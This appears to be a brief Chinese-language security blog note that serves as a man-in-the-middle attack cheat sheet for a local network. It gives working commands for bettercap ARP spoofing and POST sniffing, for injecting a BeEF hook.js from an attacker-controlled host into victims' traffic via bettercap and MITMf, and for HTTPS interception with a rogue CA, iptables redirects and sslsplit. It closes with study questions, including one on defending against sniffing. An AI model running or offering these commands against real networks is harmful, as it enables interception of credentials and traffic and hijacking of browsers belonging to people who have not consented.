MITM

| 分类 安全工程师  | 标签 MITM 

sniffer (ICMP/ARP)

bettercap -I enp0s31f6 -T 172.16.10.232 -S ARP -X --sniffer --proxy -P POST --log-timestamp --log /root/Desktop/232 --silent

hook.js and msfconsole

  • beef

    vim config.yaml vim extensions/metasploit/config.yaml

  • metasploit

    load msgrpc ServerHost=172.16.10.222 Pass=abc123 SSL=y

    如果不加ssl,需要确定在beef的配置文件中将ssl_vertify设置为false即可

  • start beef
  • Inject js

    bettercap -I enp0s31f6 -T 172.16.10.246 -S ARP -X --sniffer --proxy -P POST --proxy --proxy-module injectjs --js-url http://172.16.10.222:3000/hook.js

    查看帮助 bettercap --proxy-module injectjs -h

我使用了下mitmf,感觉没有bettercap好用,mitmf是这样用的 python mitmf.py -i enp0s31f6 --arp --spoof --target 172.16.10.246 --gateway 172.16.10.1 --hsts --inject --js-url http://172.16.10.222:3000/hook.js

端口号占用需要修改config目录下的mitmf.conf, 以上两个都需要root权限

https中间人

  • apt-get install libssl-dev libevent-dev

  • openssl genrsa -out ca.key 2048
    openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
    
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
    iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
    iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
    iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
    iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443
    
arpspoof -i eth0 -t target -r gateway
sslsplit -D -l connect.log -j  ./test -S ./log -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
# 端口是你设置的转发端口
  • DNS 欺骗的方式有哪些?
  • MITM攻击除了DNS之外呢?
  • DNS传输数据的方式,哪些工具?
  • 如何内网防嗅探,防数据泄露?
  • bettercap 的proxy modules怎么使用
  • sslsplit 和ssltrip的原理差异
  • 内网攻击有哪些方式
  • 对比mitmproxy这类工具呢?

资源


上一篇     下一篇